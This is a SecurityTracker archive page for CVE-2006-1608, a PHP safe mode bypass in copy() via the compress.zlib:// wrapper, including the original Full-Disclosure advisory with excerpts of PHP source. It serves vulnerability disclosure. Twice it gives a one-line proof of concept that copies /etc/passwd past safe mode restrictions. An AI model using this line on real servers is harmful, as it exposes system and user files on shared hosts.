SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP copy() Function Safe Mode Checking Error Lets Users Bypass Safe Mode File Access Restrictions
SecurityTracker Alert ID:  1015882
SecurityTracker URL:  http://securitytracker.com/id/1015882
CVE Reference:   CVE-2006-1608   (Links to External Site)
Date:  Apr 9 2006
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.4.2, 5.1.2
Description:   A vulnerability was reported in PHP in the copy() function. A user can bypass safe mode restrictions.

A user with the privileges to load arbitrary PHP code can create PHP code with a copy() function that uses a specially crafted path for the source argument. When the copy function is executed, the function will bypass safe mode restrictions. A local user can exploit this to gain unauthorized access to files on the target system.

A demonstration exploit function is provided:

copy("compress.zlib:///etc/passwd", "/home/cxib/to/bandyta/passwd.txt");

Maksymilian Arciemowicz (cXIb8O3) of SecurityReason.com reported this vulnerability.

A demonstration exploit is available at:

http://securityreason.com/achievement_exploitalert/8

The original advisory is available at:

http://securityreason.com/achievement_securityalert/37

Impact:   A user with the ability to load arbitrary PHP code can bypass safe mode restrictions and copy files on the target system.
Solution:   The vendor has issued a fixed version (5.1.3RC3), available at:

http://www.php.net/downloads.php

Vendor URL:  www.php.net/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2

Source: http://securityreason.com/achievement_securityalert/37

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 2.4.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1608

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 

The PHP safe mode is an attempt to solve the shared-server security problem. 
It is architecturally incorrect to try to solve this problem at the PHP 
level, but since the alternatives at the web server and OS levels aren't very 
realistic, many people, especially ISP's, use safe mode for now.

- --- 1. Safe Mode Bypass ---
General problem exists in safe mode function, because safe mode accept path 
like "compress.zlib://". 

PHP442 File "main/safe_mode.c"
- -78-80---
	wrapper = php_stream_locate_url_wrapper(filename, NULL, 
STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC);
	if (wrapper != NULL)
		return 1;
- -78-80---

if php_stream_locate_url_wrapper() return something.. safe mode is going to 
stop.
Let`s see the function php_stream_locate_url_wrapper().

PHP442 File "main/streams.c"

- -2522-2588---
PHPAPI php_stream_wrapper *php_stream_locate_url_wrapper(const char *path, 
char **path_for_open, int options TSRMLS_DC)
{
	HashTable *wrapper_hash = (FG(stream_wrappers) ? FG(stream_wrappers) : 
&url_stream_wrappers_hash);
	php_stream_wrapper *wrapper = NULL;
	const char *p, *protocol = NULL;
	int n = 0;

	if (path_for_open)
		*path_for_open = (char*)path;

	if (options & IGNORE_URL)
		return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : 
&php_plain_files_wrapper;
	
	for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) 
{
		n++;
	}

	if ((*p == ':') && (n > 1) && !strncmp("://", p, 3)) {
		protocol = path;
	} else if (strncasecmp(path, "zlib:", 5) == 0) {
		/* BC with older php scripts and zlib wrapper */
		protocol = "compress.zlib";
		n = 13;
		if (options & REPORT_ERRORS) {
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "Use of \"zlib:\" wrapper is 
deprecated; please use \"compress.zlib://\" instead.");
		}
	}

	if (protocol)	{
		if (FAILURE == zend_hash_find(wrapper_hash, (char*)protocol, n, 
(void**)&wrapper))	{
			char wrapper_name[32];

			if (options & REPORT_ERRORS) {
				if (n >= sizeof(wrapper_name))
					n = sizeof(wrapper_name) - 1;
				PHP_STRLCPY(wrapper_name, protocol, sizeof(wrapper_name), n);
			
				php_error_docref(NULL TSRMLS_CC, E_NOTICE, "Unable to find the wrapper 
\"%s\" - did you forget to enable it when you configured PHP?",
						wrapper_name);
			}

			wrapper = NULL;
			protocol = NULL;
		}
	}
	/* TODO: curl based streams probably support file:// properly */
	if (!protocol || !strncasecmp(protocol, "file", n))	{
		if (protocol && path[n+1] == '/' && path[n+2] == '/')	{
			if (options & REPORT_ERRORS)
				php_error_docref(NULL TSRMLS_CC, E_WARNING, "remote host file access not 
supported, %s", path);
			return NULL;
		}
		if (protocol && path_for_open)
			*path_for_open = (char*)path + n + 1;
		
		/* fall back on regular file access */
		return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : 
&php_plain_files_wrapper;
	}

	if (wrapper && wrapper->is_url && !PG(allow_url_fopen)) {
		if (options & REPORT_ERRORS)
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL file-access is disabled in 
the server configuration");
		return NULL;
	}
	
	return wrapper;
}
- -2522-2588---

So if you use in your path (for example "compress.zlib://"), function 
php_stream_locate_url_wrapper() return something variable and safe mode 
return 1.

Let's see now the source of function copy().

PHP442: ext/standard/file.c

- -2114-2138---
PHP_FUNCTION(copy)
{
	zval **source, **target;

	if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &source, &target) == 
FAILURE) {
		WRONG_PARAM_COUNT;
	}

	convert_to_string_ex(source);
	convert_to_string_ex(target);

	if (PG(safe_mode) &&(!php_checkuid(Z_STRVAL_PP(source), NULL, 
CHECKUID_CHECK_FILE_AND_DIR))) {
		RETURN_FALSE;
	}

	if (php_check_open_basedir(Z_STRVAL_PP(source) TSRMLS_CC)) {
		RETURN_FALSE;
	}

	if (php_copy_file(Z_STRVAL_PP(source), Z_STRVAL_PP(target) 
TSRMLS_CC)==SUCCESS) {
		RETURN_TRUE;
	} else {
		RETURN_FALSE;
	}
}
- -2114-2138---

http://pl2.php.net/manual/en/function.copy.php

Description
bool copy ( string source, string dest )

example:
copy("compress.zlib:///etc/passwd", "/home/cxib/to/bandyta/passwd.txt");

safe mode return 1 and skip security.

	if (PG(safe_mode) &&(!php_checkuid(Z_STRVAL_PP(source), NULL, 
CHECKUID_CHECK_FILE_AND_DIR))) {
		RETURN_FALSE;
	}

return true.

Rest functions have checking safe_mode without path and safe mode works. I 
don't have tested all functions in php ;].

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Exploit ---
http://securityreason.com/achievement_exploitalert/8

- --- 4. Greets ---

For: sp3x
and
p_e_a, eax, Infospec

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAu93Ke13X/fTO4RApXzAKC4OuM/3vn8kyw+EP2R8YVYyH9gkgCcDCMj
2dB55e2x6sPGBJW+w9Kw/OY=
=Lfuk
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC